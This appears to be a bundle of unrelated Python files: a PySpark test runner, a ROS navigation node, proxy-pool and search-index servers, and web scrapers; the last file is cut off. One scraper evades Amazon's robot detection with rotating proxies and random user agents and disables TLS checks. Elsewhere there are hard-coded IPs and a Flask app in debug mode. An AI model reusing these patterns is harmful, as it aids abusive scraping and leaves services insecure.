python_execs.insert(0, "python")
return python_execs
def parse_opts():
parser = OptionParser(
prog="run-tests"
)
parser.add_option(
"--python-executables", type="string", default=','.join(get_default_python_executables()),
help="A comma-separated list of Python executables to test against (default: %default)"
)
parser.add_option(
"--modules", type="string",
default=",".join(sorted(python_modules.keys())),
help="A comma-separated list of Python modules to test (default: %default)"
)
parser.add_option(
"-p", "--parallelism", type="int", default=4,
help="The number of suites to test in parallel (default %default)"
)
parser.add_option(
"--verbose", action="store_true",
help="Enable additional debug logging"
)
(opts, args) = parser.parse_args()
if args:
parser.error("Unsupported arguments: %s" % ' '.join(args))
if opts.parallelism < 1:
parser.error("Parallelism cannot be less than 1")
return opts
def _check_dependencies(python_exec, modules_to_test):
# If we should test 'pyspark-sql', it checks if PyArrow and Pandas are installed and
# explicitly prints out. See SPARK-23300.
if pyspark_sql in modules_to_test:
# TODO(HyukjinKwon): Relocate and deduplicate these version specifications.
minimum_pyarrow_version = '0.8.0'
minimum_pandas_version = '0.19.2'
try:
pyarrow_version = subprocess_check_output(
[python_exec, "-c", "import pyarrow; print(pyarrow.__version__)"],
universal_newlines=True,
stderr=open(os.devnull, 'w')).strip()
if LooseVersion(pyarrow_version) >= LooseVersion(minimum_pyarrow_version):
LOGGER.info("Will test PyArrow related features against Python executable "
"'%s' in '%s' module." % (python_exec, pyspark_sql.name))
else:
LOGGER.warning(
"Will skip PyArrow related features against Python executable "
"'%s' in '%s' module. PyArrow >= %s is required; however, PyArrow "
"%s was found." % (
python_exec, pyspark_sql.name, minimum_pyarrow_version, pyarrow_version))
except:
LOGGER.warning(
"Will skip PyArrow related features against Python executable "
"'%s' in '%s' module. PyArrow >= %s is required; however, PyArrow "
"was not found." % (python_exec, pyspark_sql.name, minimum_pyarrow_version))
try:
pandas_version = subprocess_check_output(
[python_exec, "-c", "import pandas; print(pandas.__version__)"],
universal_newlines=True,
stderr=open(os.devnull, 'w')).strip()
if LooseVersion(pandas_version) >= LooseVersion(minimum_pandas_version):
LOGGER.info("Will test Pandas related features against Python executable "
"'%s' in '%s' module." % (python_exec, pyspark_sql.name))
else:
LOGGER.warning(
"Will skip Pandas related features against Python executable "
"'%s' in '%s' module. Pandas >= %s is required; however, Pandas "
"%s was found." % (
python_exec, pyspark_sql.name, minimum_pandas_version, pandas_version))
except:
LOGGER.warning(
"Will skip Pandas related features against Python executable "
"'%s' in '%s' module. Pandas >= %s is required; however, Pandas "
"was not found." % (python_exec, pyspark_sql.name, minimum_pandas_version))
def main():
opts = parse_opts()
if (opts.verbose):
log_level = logging.DEBUG
else:
log_level = logging.INFO
logging.basicConfig(stream=sys.stdout, level=log_level, format="%(message)s")
LOGGER.info("Running PySpark tests. Output is in %s", LOG_FILE)
if os.path.exists(LOG_FILE):
os.remove(LOG_FILE)
python_execs = opts.python_executables.split(',')
modules_to_test = []
for module_name in opts.modules.split(','):
if module_name in python_modules:
modules_to_test.append(python_modules[module_name])
else:
print("Error: unrecognized module '%s'. Supported modules: %s" %
(module_name, ", ".join(python_modules)))
sys.exit(-1)
LOGGER.info("Will test against the following Python executables: %s", python_execs)
LOGGER.info("Will test the following Python modules: %s", [x.name for x in modules_to_test])
task_queue = Queue.PriorityQueue()
for python_exec in python_execs:
# Check if the python executable has proper dependencies installed to run tests
# for given modules properly.
_check_dependencies(python_exec, modules_to_test)
python_implementation = subprocess_check_output(
[python_exec, "-c", "import platform; print(platform.python_implementation())"],
universal_newlines=True).strip()
LOGGER.debug("%s python_implementation is %s", python_exec, python_implementation)
LOGGER.debug("%s version is: %s", python_exec, subprocess_check_output(
[python_exec, "--version"], stderr=subprocess.STDOUT, universal_newlines=True).strip())
for module in modules_to_test:
if python_implementation not in module.blacklisted_python_implementations:
for test_goal in module.python_test_goals:
if test_goal in ('pyspark.streaming.tests', 'pyspark.mllib.tests',
'pyspark.tests', 'pyspark.sql.tests'):
priority = 0
else:
priority = 100
task_queue.put((priority, (python_exec, test_goal)))
def process_queue(task_queue):
while True:
try:
(priority, (python_exec, test_goal)) = task_queue.get_nowait()
except Queue.Empty:
break
try:
run_individual_python_test(test_goal, python_exec)
finally:
task_queue.task_done()
start_time = time.time()
for _ in range(opts.parallelism):
worker = Thread(target=process_queue, args=(task_queue,))
worker.daemon = True
worker.start()
try:
task_queue.join()
except (KeyboardInterrupt, SystemExit):
print_red("Exiting due to interrupt")
sys.exit(-1)
total_duration = time.time() - start_time
LOGGER.info("Tests passed in %i seconds", total_duration)
if __name__ == "__main__":
main()
|
goal_generation_node copy.py
|
#!/bin/python3
import time
import rospy
import std_msgs.msg as ros_std_msg
import geometry_msgs.msg as ros_geom_msg
from threading import Thread
import numpy as np
from datetime import datetime
import tf
import actionlib
import move_base_msgs.msg as ros_mb_msg
# --------------------
# GENERAL NOTES
# - In this script, a semantic navigation system is implemented for a robot in
# an underground environment. The expected inputs for this node are:
# - /gallery_angles: These are obtained by a different node. List of
#   angles, relative to the robot, at which a gallery is found. This also
#   includes the current gallery, i.e. the front and the back.
# - /tile_type: This topic should continually publish whether the robot is
#   in an intersection, a straight section, a curve, etc.
#
#
# --------------------
def euler_to_quaternion(yaw, pitch, roll):
qx = np.sin(roll/2) * np.cos(pitch/2) * np.cos(yaw/2) - \
np.cos(roll/2) * np.sin(pitch/2) * np.sin(yaw/2)
qy = np.cos(roll/2) * np.sin(pitch/2) * np.cos(yaw/2) + \
np.sin(roll/2) * np.cos(pitch/2) * np.sin(yaw/2)
qz = np.cos(roll/2) * np.cos(pitch/2) * np.sin(yaw/2) - \
np.sin(roll/2) * np.sin(pitch/2) * np.cos(yaw/2)
qw = np.cos(roll/2) * np.cos(pitch/2) * np.cos(yaw/2) + \
np.sin(roll/2) * np.sin(pitch/2) * np.sin(yaw/2)
return [qx, qy, qz, qw]
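# Quick sanity check (illustrative): a pure yaw of pi/2 with zero pitch and roll gives
#   euler_to_quaternion(np.pi / 2, 0, 0)  ->  [0.0, 0.0, 0.7071, 0.7071] (approximately),
# i.e. a 90-degree rotation about the z axis in (x, y, z, w) order.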
class Nodo:
"""La clase nodo está pensada para almacenar
los distintos nodos del mapa, así como las
relaciones entre las diferentes galerías que
a las que está conectado."""
def __init__(self, map, n_galleries):
self.n_galleries = n_galleries
class Galeria:
def __init__(self, map):
# A gallery can only connect two nodes
self.map = map
self.nodes = [None, None]
class Mapa:
"""La clase mapa está pensada para almacenar
una serie de nodos conectados por galerías,
y conservar las relaciones entre estos nodos"""
def __init__(self) -> None:
self.nodes = list()
self.galleries = list()
class GoalGenerationNode:
def __init__(self, goal_time_interval=1, goal_distance=3):
self.instructions = rospy.get_param("/instructions")
self.n_instruction = 0
self.block_update_of_quadrants = False
self.goal_time_interval = goal_time_interval
self.goal_distance = goal_distance
self.reset_quadrants()
self.time = datetime.now()
self.seq = 0
rospy.init_node(self.__class__.__name__)
self.listener = tf.TransformListener()
self.tf_transformer = tf.TransformerROS()
self.tile_type_subscriber = rospy.Subscriber(
"/environment_label", ros_std_msg.String, callback=self.tile_type_callback)
self.gallery_subscriber = rospy.Subscriber(
"/gallery_detection_vector", ros_std_msg.Float32MultiArray, self.gallery_detection_callback)
self.move_base_client = actionlib.SimpleActionClient("move_base",ros_mb_msg.MoveBaseAction)
if not self.move_base_client.wait_for_server(rospy.Duration(5)):
rospy.logerr("THERE IS NO MOVE BASE NODE")
self.first_callback = False
while not self.first_callback:
rospy.sleep(0.5)
self.run_thread = Thread(target=self.run)
self.already_chosen_exit = False
self.run_thread.start()
self.run_thread.join()
def reset_quadrants(self):
self.quadrants = { "front":[],
"left": [],
"right":[],
"back":[]
}
def tile_type_callback(self, msg: ros_std_msg.String):
self.tile_type = msg.data
def array_position_to_angle(self, array_position):
return 180 - array_position
def get_galleries_from_vector(self, vector):
self.vector = vector
self.filtered = np.zeros(360)
for i in range(360):
to_check = vector[i]
self.filtered[i] = to_check
for j in range(31):
                subsection_index = ((-15 + j) + i) % 360  # wrap around the 360-bin vector
if vector[subsection_index] > to_check:
self.filtered[i] = 0
max_peak = np.max(self.filtered)
galleries_indices = np.nonzero(self.filtered > max_peak * 0.5)
galleries_angles = []
for index in galleries_indices:
galleries_angles.append(
self.array_position_to_angle(index)/180.0 * np.math.pi)
return np.array(galleries_angles)[0]
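    # Note (illustrative): get_galleries_from_vector above is a simple non-maximum
    # suppression: a bin survives only if no other bin in a 31-bin window around it is
    # larger, surviving peaks below 50% of the strongest peak are discarded, and the
    # remaining array positions (0..359) are converted to angles in radians.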
def gallery_detection_callback(self, msg: ros_std_msg.Float32MultiArray):
""" This function should take the input from the neural network, and
translate it to quadrants"""
if self.block_update_of_quadrants:
return
self.updating_quadrants = True
data = np.array(msg.data)
angles_of_galleries = self.get_galleries_from_vector(data)
self.reset_quadrants()
for angle in angles_of_galleries:
if angle > -np.math.pi/4 and angle < np.math.pi/4:
self.quadrants["front"].append(angle)
elif angle > -np.math.pi*3/4 and angle < -np.math.pi/4:
self.quadrants["right"].append(angle)
elif angle > np.math.pi/4 and angle < np.math.pi*3/4:
self.quadrants["left"].append(angle)
elif angle > np.math.pi*3/4 or angle < -np.math.pi*3/4:
self.quadrants["back"].append(angle)
self.gallery_in_quadrant = [self.quadrants[q].__len__()>0 for q in self.quadrants.keys()]
self.in_intersection = sum(self.gallery_in_quadrant) > 2
self.first_callback = True
self.updating_quadrants = False
def is_there_exit(self, quadrant:str):
return len(self.quadrants[quadrant]) > 0
def goal_from_angle(self, angle):
goal = ros_geom_msg.PoseStamped()
goal.header.frame_id = "base_link"
goal.header.seq = self.seq
goal.header.stamp = rospy.Time.now()
self.seq += 1
quaternion = euler_to_quaternion(angle, 0, 0)
goal.pose.orientation.x = quaternion[0]
goal.pose.orientation.y = quaternion[1]
goal.pose.orientation.z = quaternion[2]
goal.pose.orientation.w = quaternion[3]
goal.pose.position.x = self.goal_distance * np.math.cos(angle)
goal.pose.position.y = self.goal_distance * np.math.sin(angle)
goal.pose.position.z = 0
# Transform the goal to the map frame
t = self.listener.getLatestCommonTime("odom", "base_link")
self.tf_transformer._buffer = self.listener._buffer
goal.header.stamp = t
goal = self.tf_transformer.transformPose("odom", goal)
goal_msg = ros_mb_msg.MoveBaseGoal()
goal_msg.target_pose = goal
return goal_msg
def generate_and_send_goal(self):
print("Generate and send goal")
self.only_back = False
while self.updating_quadrants:
time.sleep(0.01)
self.block_update_of_quadrants = True
print(self.quadrants)
if self.in_intersection:
if self.already_chosen_exit:
goal_msg = self.goal_from_angle(self.quadrants["front"][0])
else:
goal_msg = self.goal_from_angle(self.quadrants[self.instructions[self.n_instruction]][0])
self.already_chosen_exit = True
self.n_instruction += 1
else:
self.already_chosen_exit = False
if self.gallery_in_quadrant[0]:
goal_msg = self.goal_from_angle(self.quadrants["front"][0])
print("going front")
elif self.gallery_in_quadrant[1]:
goal_msg = self.goal_from_angle(self.quadrants["right"][0])
print("going right")
elif self.gallery_in_quadrant[2]:
goal_msg = self.goal_from_angle(self.quadrants["left"][0])
print("going left")
elif self.gallery_in_quadrant[3]:
goal_msg = self.goal_from_angle(self.quadrants["back"][0])
print("going back")
self.block_update_of_quadrants = True
self.move_base_client.send_goal(goal_msg,done_cb=self.done_cb,active_cb=self.active_cb,feedback_cb=self.feedback_cb)
self.previous_goal = goal_msg
def done_cb(self,msg, msg2):
self.generate_and_send_goal()
def active_cb(self):
pass
def feedback_cb(self, msg):
pass
def run(self):
# while not rospy.is_shutdown():
# self.generate_and_send_goal()
# rospy.sleep(self.goal_time_interval)
self.generate_and_send_goal()
if __name__ == "__main__":
goal_generation_node = GoalGenerationNode()
rospy.spin()
|
crawl_info.py
|
"""
Crawl info for further use
"""
import time
import random
import threading
from fake_useragent import UserAgent
from bs4 import BeautifulSoup
import redis
import urllib3
import requests
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
ua = UserAgent()
db = redis.StrictRedis(host='127.0.0.1', port=6379, decode_responses=True)
THREAD_NUM = 70
ip_dict = {}
def parser(html, raw_movie_id, proxy):
"""
Check the Sent html
"""
soup = BeautifulSoup(html, 'lxml')
element = soup.find(id='productTitle')
title = ''
# Get The Title
if element is None:
element = soup.find('h1', attrs={'class': 'avu-full-width'})
if element is None: # Error
db.sadd('raw_movie_id', raw_movie_id) # put back
print('Robot Detect!!!!!!!!!!!!!!!!!!!!!!')
if proxy in ip_dict:
ip_dict[proxy] += 1
if ip_dict[proxy] > 10:
requests.get('http://127.0.0.1:5010/delete?proxy=' + proxy) # delete proxy
else:
ip_dict[proxy] = 1
return False
else: # Prime Video Page
title = element.text
else: # Simple Page
title = element.text
if 'Director' not in html: # A movie must have a director
return False
if 'Season' in html: # TV show
return False
    if 'Fitness' in html:  # Not a movie
return False
if 'Music Videos' in html:
return False
if 'Concerts' in html:
return False
db.sadd('real_movie_id', raw_movie_id)
return True
def get_and_parse(number):
"""
    Get a raw_movie_id, a proxy and the HTML, and send them to the parser
"""
header = {
'User-Agent': ua.random,
'accept-language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.6',
'accept': 'text/html,application/xhtml+xml,application/xml;\
q=0.9,image/webp,image/apng,*/*;q=0.8',
'accept-encoding': 'gzip, deflate, br'
}
raw_movie_id = db.spop('raw_movie_id')
url = 'https://www.amazon.com/dp/' + raw_movie_id
r = requests.get('http://127.0.0.1:5010/get_all/').json()
if not r:
proxy = '127.0.0.1:1087'
else:
proxy = random.choice(r)
try:
proxier = {'https' : 'http://' + proxy}
response = requests.get(url, headers=header, proxies=proxier, timeout=10, verify=False)
except Exception:
db.sadd('raw_movie_id', raw_movie_id)
print('Requests Failure!\n\n')
else:
if response.status_code == 404:
print('Getting ' + url)
print('Number ' + str(number))
print('Page 404' + '\n\n')
        elif response.status_code == 200:  # got the page, parse the title
if parser(response.text, raw_movie_id, proxy):
print('Getting ' + url)
print('Number ' + str(number))
print('Yes!' + '\n\n')
else:
print('Getting ' + url)
print('Number ' + str(number))
print('Nope!' + '\n\n')
else:
print('Getting ' + url)
print('Number ' + str(number))
print('Something Wrong!')
db.sadd('raw_movie_id', raw_movie_id)
print(str(response.status_code) + '\n\n')
if __name__ == '__main__':
for i in range(250000):
while threading.active_count() > THREAD_NUM: # Change
t = 5 * random.random()
if t < 0.5:
t += 1.5
elif t > 3.5:
t -= 2.5
time.sleep(t)
t = threading.Thread(target=get_and_parse, args=(i,))
t.start()
    while threading.active_count() > 1:  # Wait for the threads created above to finish
time.sleep(0.2)
print('------------Finish-----------')
|
main.py
|
# -*- coding: utf8 -*-
import random
import time
import logging
import tornado.ioloop
import tornado.web
from threading import Thread
from tornado.options import define, options
from tornado.httpserver import HTTPServer
from spider import xici
from check import checkProxy
define("port", default=8080, type=8080, help="server port")
class ProxyApi(tornado.web.RequestHandler):
def get(self):
return_dict = {}
totle = self.get_argument("totle", 0)
try:
totle = int(totle)
except:
totle = 0
from db import cacheDB
proxy_db = cacheDB.proxyDB
proxy_pool = proxy_db.getValue("proxy_pool")
if len(proxy_pool) <= totle:
totle_proxy_list = proxy_pool
else:
totle_proxy_list = random.sample(proxy_pool, totle)
for i, k in enumerate(totle_proxy_list, 1):
return_dict[i] = k
self.write(return_dict)
def post(self):
self.get()
def proxy_threading():
"""
爬虫任务进程
:return:
"""
    # Brute-force approach: loop forever, fetching and validating proxies for the pool
while True:
xici.xici_spider(3)
checkProxy.verify_proxy_pool()
        # Sleep 10 minutes before running the task again
time.sleep(60 * 10)
proxyThread = proxy_threading
def run_server():
"""
服务运行入口
:return:
"""
app = tornado.web.Application(
[(r"/api", ProxyApi)]
)
options.parse_command_line()
http_server = HTTPServer(app)
http_server.bind(options.port)
http_server.start()
    # Start a separate thread to run the crawler task
proxy_thread = Thread(target=proxyThread)
proxy_thread.start()
logging.info("Server is running......")
tornado.ioloop.IOLoop.current().start()
if __name__ == "__main__":
run_server()
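# Illustrative client usage (hypothetical values; assumes the server is running locally
# on the default port 8080 defined above):
#   import requests
#   resp = requests.get("http://127.0.0.1:8080/api", params={"totle": 5})
#   print(resp.json())  # e.g. {"1": "1.2.3.4:8080", "2": "5.6.7.8:3128", ...}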
|
idx_server.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
idx_server.py -
author: Pablo Caruana
email: pablo dot caruana at gmail dot com
date: 12/1/2016
"""
import time
import schedule
import requests
from flask import Flask, jsonify, request
from threading import Thread
import os
from query_processing import query_main
from indexed_chunks import snippet_builder
from read_chunk import get_chunk
try:
os.makedirs("content_files")
except OSError:
if not os.path.isdir("content_files"):
raise
app = Flask(__name__)
s = requests.Session()
mgmt_ip_addr = '54.159.82.218'
index_builder_ip_addr = '54.174.171.194'
crawler_ip_addr = '52.90.210.211'
THE_IDX = {}
content_chunk_list = []
# For test
@app.route('/', methods=['GET'])
def hello_world():
return jsonify(message="Hello World!")
# For management
online = s.post('http://{0}:5000/set_state/component'.format(mgmt_ip_addr), json={"state": "online"})
print(online.json())
@app.route('/get_health', methods=['GET'])
def is_healthy():
return jsonify(status = "healthy")
# From Management and Index-builder
def run_schedule():
while True:
schedule.run_pending()
time.sleep(1)
def get_chunks():
chunk_metadata = s.get('http://{0}:5000/get_chunks'.format(mgmt_ip_addr)) # list of dicts
print(chunk_metadata)
crawler_host_dict = {}
ib_host_dict = {}
global content_chunk_list
for item in chunk_metadata:
crawler_host_dict[item['chunk_id']] = item['hosts']['c_host']
ib_host_dict[item['chunk_id']] = item['hosts']['ib_host']
print("crawler_host_dict:{0}".format(crawler_host_dict))
print("ib_host_dict:{0}".format(ib_host_dict))
for k, v in ib_host_dict.items():
json_file = requests.get('http://{1}:5000/indexed_chunk/indexed_{0}.json'.format(k, v))
THE_IDX.update(json_file.json()) # Saving to the main index as a dictionary
print("Index recorded for chunk: {0}".format(k))
for k, v in crawler_host_dict.items():
content_data = requests.get('http://{1}:5000/get_chunk/{0}'.format(k, v), stream=True)
with open("content_files/{0}".format(k), "wb") as f:
f.write(content_data.content)
        # the with-block closes the file automatically
print("Content file created for chunk: {0}".format(k))
content_chunk = get_chunk("content_files/{0}".format(k))
content_chunk_list += content_chunk
# For front-end
@app.route('/getdocids/search', methods=['GET'])
def get_query():
q = request.args.get('q')
dict_of_ids_with_ranks = query_main(q)
return jsonify(dict_of_ids_with_ranks)
@app.route('/get_snippet', methods=['GET'])
def get_snippet():
id_ = request.args.get('id')
snippets = snippet_builder(id_)
return jsonify(snippets)
if __name__ == '__main__':
schedule.every(10).seconds.do(get_chunks)
    t = Thread(target=run_schedule)  # pass the function itself; calling it here would block forever
t.start()
app.run(debug = True, port = 5000)
|
get_urls_text.py
|
# -*- coding: utf-8 -*-
from codecs import open
import json
import threading, queue
import argparse
import time
import random
import re
from urllib.request import urlopen
import pickle
from bs4 import BeautifulSoup
from nltk import word_tokenize
from nltk.util import ngrams
from collections import Counter
from langdetect import detect
from langdetect import DetectorFactory
DetectorFactory.seed = 0
#import tensorflow as tf
#import numpy as np
import html2text
from google.cloud import storage  # needed by upload_blob/download_blob below
#import htmlparser
def upload_blob(bucket_name, source_file_name, destination_blob_name):
"""Uploads a file to the bucket."""
# bucket_name = "your-bucket-name"
# source_file_name = "local/path/to/file"
# destination_blob_name = "storage-object-name"
storage_client = storage.Client()
bucket = storage_client.bucket(bucket_name)
blob = bucket.blob(destination_blob_name)
blob.upload_from_filename(source_file_name)
print(
"File {} uploaded to {}.".format(
source_file_name, destination_blob_name
)
)
def download_blob(bucket_name, source_blob_name, destination_file_name):
"""Downloads a blob from the bucket."""
# bucket_name = "your-bucket-name"
# source_blob_name = "storage-object-name"
# destination_file_name = "local/path/to/file"
storage_client = storage.Client()
bucket = storage_client.bucket(bucket_name)
# Construct a client side representation of a blob.
# Note `Bucket.blob` differs from `Bucket.get_blob` as it doesn't retrieve
# any content from Google Cloud Storage. As we don't need additional data,
# using `Bucket.blob` is preferred here.
blob = bucket.blob(source_blob_name)
blob.download_to_filename(destination_file_name)
print(
"Blob {} downloaded to {}.".format(
source_blob_name, destination_file_name
)
)
q = queue.Queue()
inputs_to_store = queue.Queue()
text_maker = html2text.HTML2Text()
text_maker.ignore_links = True
text_maker.ignore_tables = True
text_maker.ignore_images = True
text_maker.ignore_anchors = True
text_maker.ignore_emphasis = True
text_maker.body_width = 0
def drain(q):
while True:
try:
yield q.get_nowait()
except queue.Empty: # on python 2 use Queue.Empty
break
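# Example: list(drain(q)) empties the queue, yielding its items in FIFO order without blocking.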
def bsoup_parse(html):
soup = BeautifulSoup(html, features="html.parser")
# kill all script and style elements
for script in soup(["script", "style"]):
script.extract() # rip it out
# get text
text = soup.get_text()
# break into lines and remove leading and trailing space on each
lines = (line.strip() for line in text.splitlines())
# break multi-headlines into a line each
chunks = (phrase.strip() for line in lines for phrase in line.split(" "))
# drop blank lines
text = '\n'.join(chunk for chunk in chunks if chunk)
return text
def html2text_parse(html):
text = text_maker.handle(html)
return text
# Taken from Wikisum: https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/data_generators/wikisum/utils.py
_SOME_ALPHA_RE = re.compile(r'[A-Za-z]+')
_ONLY_ALPHA_RE = re.compile(r'^[A-Za-z]*$')
def filter_paragraph(p):
"""Simple filter to remove obviously bad paragraphs (bad text extraction).
Note this needs to run very quickly as it is applied to every paragraph
in the corpus, so nothing fancy! This whole method should be linear
expected time in len(p).
Args:
p: string, paragraph
Returns:
True if we should remove the paragraph.
"""
# create a space between a word and the punctuation following it,
# e.g. "he is a boy." => "he is a boy ."
p = re.sub(r"([?.!,¿])", r" \1 ", p)
p = re.sub(r'[" "]+', " ", p)
# replace everything with a space except (a-z, A-Z, ".", "?", "!", ",", digits, parentheses and Portuguese accented letters)
p = re.sub(r"[^a-zA-ZçÇéêíáâãõôóúûÉÊÍÁÂÃÕÔÓÚÛ?.!,()0-9]+", " ", p).lower()
# and then lower-case it
p = p.strip()
# Expect a minimum number of words.
tokens = p.split()
if len(tokens) < 6:
#print(tokens, 'aqui')
return True, p
# Require some letters.
if not re.search(_SOME_ALPHA_RE, p):
#print(tokens, 'aqui1')
return True, p
# Keep this one at the end, probably the most complicated logic.
# We try to detect sentences, which should have a minimum of 3 tokens
# with only alphabetic characters.
last = 0
found_sentence = False
num_alpha = 0
for i, x in enumerate(tokens):
if x == '.':
if i - last > 3 and num_alpha >= 3:
found_sentence = True
break
last = i
num_alpha = 0
if re.match(_ONLY_ALPHA_RE, x):
#print('OIOIOIO')
num_alpha += 1
if not found_sentence:
#print(tokens, 'aqui2')
return True, p
#print(tokens, 'aqui3')
return False, p
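# Illustrative examples of the filter above (values follow from the cleaning rules):
#   filter_paragraph("too short")
#   # -> (True, "too short")            # fewer than 6 tokens, so flagged for removal
#   filter_paragraph("this is a plain sentence with enough tokens in it .")
#   # -> (False, "this is a plain sentence with enough tokens in it .")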
def detect_clone(text, article_sections):
text_tokens = word_tokenize(text)
for section in article_sections:
if(len(section)>0):
section_tokens = word_tokenize(section.lower())
#print(list(section_unigrams))
count_intersection = len(set(section_tokens) & set(text_tokens))
clone_prob = float(count_intersection)/len(section_tokens)
#print(count_intersection, len(section_tokens), len(text_tokens), clone_prob)
if(clone_prob > 0.5):
#print(section, text)
return True
return False
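# Note: detect_clone treats a candidate text as a near-copy of the Wikipedia article when its
# token set overlaps more than 50% with any single article section, so such pages are skipped.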
def get_page_text(url, article_sections=None):
to_save = []
try:
url_fetch = urlopen(url, timeout=3)
url_bytes = url_fetch.read()
html_str = url_bytes#.decode("utf-8")
text = bsoup_parse(html_str)
if article_sections != None:
if detect_clone(text, article_sections):
return to_save
paragraphs = text.split('\n')
for paragraph in paragraphs:
not_good, processed_para = filter_paragraph(paragraph)
if not not_good:
lang = detect(processed_para)
if(lang == 'pt'):
to_save.append(processed_para)
except Exception as e:
pass
finally:
return to_save
def worker():
while True:
item = q.get()
url = item[0]
article_sections = item[1]
extension = url.split('.')[-1]
article_id = item[2]
article_title = item[3]
article_sections_titles = item[4]
try:
#print("Working on {}".format(item))
# time.sleep(random.randint(1, 4)) # simulate a delay
#print(extension)
if(extension not in ['pdf', 'mp3', 'mp4', 'zip']):
paragraphs = get_page_text(url, article_sections)
#print(paragraphs)
if(len(paragraphs) != 0):
inputs_to_store.put([article_id, article_title, article_sections_titles, article_sections, paragraphs])
#print([item, paragraphs])
#print(f'Finished {item}')
except Exception as e:
#print(e)
pass
finally:
q.task_done()
def get_articles_urls(urls_file, out_file):
already_done_articles = 0
try:
with open(out_file, 'r') as file:
for line in file:
article = json.loads(line)
if(int(article['id']) > already_done_articles):
already_done_articles = int(article['id'])
#already_done_articles.append(article['id'])
except:
pass
docs = []
print('Loading articles')
with open(urls_file, 'r') as file:
for line in file:
#print('{}/{}'.format(i, 105695))
attrib = json.loads(line)
article_id = attrib['id']
article_title = attrib['title']
if(int(article_id) > already_done_articles):
article_urls = attrib['urls']
article_n_urls = attrib['n_urls']
docs.append([article_id, article_title, article_n_urls, article_urls])
return docs
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
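# Example: list(chunks([1, 2, 3, 4, 5], 2)) -> [[1, 2], [3, 4], [5]]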
def find_article_text(input_path, article_id):
article_text = []
article_sections_titles = []
for file_dir in ['AB/', 'AA/']:
for i in range(99, -1, -1):
file_name = '{}{}processed_wiki_{:02d}.json'.format(input_path, file_dir, i)
try:
with open(file_name, 'r') as file:
first_article = json.loads(file.readline())
if(int(article_id) < int(first_article['id'])):
continue
elif(int(article_id) == int(first_article['id'])):
article_text = first_article['text']
article_sections_titles = first_article['sections']
break
else:
for line in file:
new_article = json.loads(line)
if(int(article_id) == int(new_article['id'])):
article_text = new_article['text']
article_sections_titles = new_article['sections']
break
except:
pass
return article_text, article_sections_titles
def persist_data(item, file):
to_out = json.dumps(item, ensure_ascii=False).encode('utf-8')+'\n'.encode('utf-8')
file.write(to_out)
#for item in itens_dict:
# print(itens_dict)
def _bytes_feature(value):
"""Returns a bytes_list from a string / byte."""
if isinstance(value, type(tf.constant(0))):
value = value.numpy() # BytesList won't unpack a string from an EagerTensor.
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def serialize_str_list(item_list):
str_list = ""
i = 0
for item in item_list:
if(i == 0):
str_list = item
else:
str_list = str_list + "[sep]" + item
i = i + 1
return str_list.encode('utf-8')
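# Example: serialize_str_list(["intro", "body"]) -> b"intro[sep]body"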
def serialize_example(article_id, title, section_titles, section_texts, web_paragraphs):
"""
Creates a tf.train.Example message ready to be written to a file.
"""
# Create a dictionary mapping the feature name to the tf.train.Example-compatible
# data type.
feature = {
'id': _bytes_feature(article_id.encode('utf-8')),
'title': _bytes_feature(title.encode('utf-8')),
'section_titles': _bytes_feature(serialize_str_list(section_titles)),
'section_texts': _bytes_feature(serialize_str_list(section_texts)),
'web_paragraphs' : _bytes_feature(serialize_str_list(web_paragraphs))
}
# Create a Features message using tf.train.Example.
example_proto = tf.train.Example(features=tf.train.Features(feature=feature))
return example_proto.SerializeToString()
def tf_write(item, file_path):
with tf.io.TFRecordWriter(file_path) as writer:
example = serialize_example(item[0], item[1], item[2], item[3], item[4])
writer.write(example)
def check_url(url_str):
forbiden_strs = ['google', 'wikipedia', 'wikimedia', 'youtube', 'PDF', 'pdf', 'ftp', 'FTP', 'xls']
for forbiden in forbiden_strs:
if forbiden in url_str:
return False
return True
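# Examples: check_url("https://example.com/report.pdf") -> False (contains "pdf"),
#           check_url("https://example.com/article.html") -> True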
def main(args):
urls_file = '{}{}'.format(args.urls_path, args.urls_file)
output_file1 = '{}{}-WEB'.format(args.output_path, args.urls_file)
#output_file1 = '{}{}.tfrecord'.format(args.output_path, args.urls_file)
output_file2 = '{}{}-WIKI'.format(args.output_path, args.urls_file)
#print(shard_urls_file, shard_content_file)
total_start = time.time()
wiki_articles = get_articles_urls(urls_file, output_file1)
n_chunks = int(len(wiki_articles)/args.batch_size + 0.5)
i = 1
for batch in chunks(wiki_articles, args.batch_size):
start = time.time()
for article in batch:
article_id = article[0]
article_title = article[1]
n_urls = article[2]
wiki_urls = article[3]
#print(article_id)
article_sections, article_sections_titles = find_article_text(args.wiki_articles_path, article_id)
#print(len(article_sections))
if(len(article_sections) > 0):
# send thirty task requests to the worker
actual_n_urls = 0
for url in wiki_urls:
if(check_url(url)):
actual_n_urls = actual_n_urls + 1
q.put([url, article_sections, article_id, article_title, article_sections_titles])
print("Processing {}".format(article_title))
print("Sending {:d} URLs to workers".format(actual_n_urls))
# block until all tasks are done
#print(q.qsize())
q.join()
#print('aaa')
#print(inputs_to_store.qsize())
#web_paragraphs = []
if(inputs_to_store.qsize() != 0):
to_outs1 = {}
to_outs2 = {}
for url_data in drain(inputs_to_store):
article_id = url_data[0]
article_title = url_data[1]
article_sections_titles = url_data[2]
article_sections = url_data[3]
url_paragraphs = url_data[4]
if(article_id not in to_outs1):
to_outs1[article_id] = {'id' : article_id, 'title' : article_title, 'web_paragraphs' : []}
to_outs2[article_id] = {'id' : article_id, 'title' : article_title, 'sections_titles': article_sections_titles, 'sections_texts' : article_sections}
to_outs1[article_id]['web_paragraphs'] = to_outs1[article_id]['web_paragraphs'] + url_paragraphs
with open(output_file1, "ab+") as file1:
with open(output_file2, "ab+") as file2:
for article_id in to_outs1:
web_data = to_outs1[article_id]
wiki_data = to_outs2[article_id]
if(len(web_data['web_paragraphs']) >= 10):
#web_paragraphs = web_paragraphs + paragraphs
persist_data(web_data, file1)
persist_data(wiki_data, file2)
#tf_write([article_id, article_title, article_sections_titles, article_sections, web_paragraphs], output_file1)
end = time.time()
print('{:d}/{:d} completed in {:.2f} seconds.'.format(i, n_chunks, (end-start)))
i = i + 1
total_end = time.time()
print('File {} - FINAL TIME: {:.2f}'.format(args.urls_file, (total_end-total_start)))
if __name__ == '__main__':
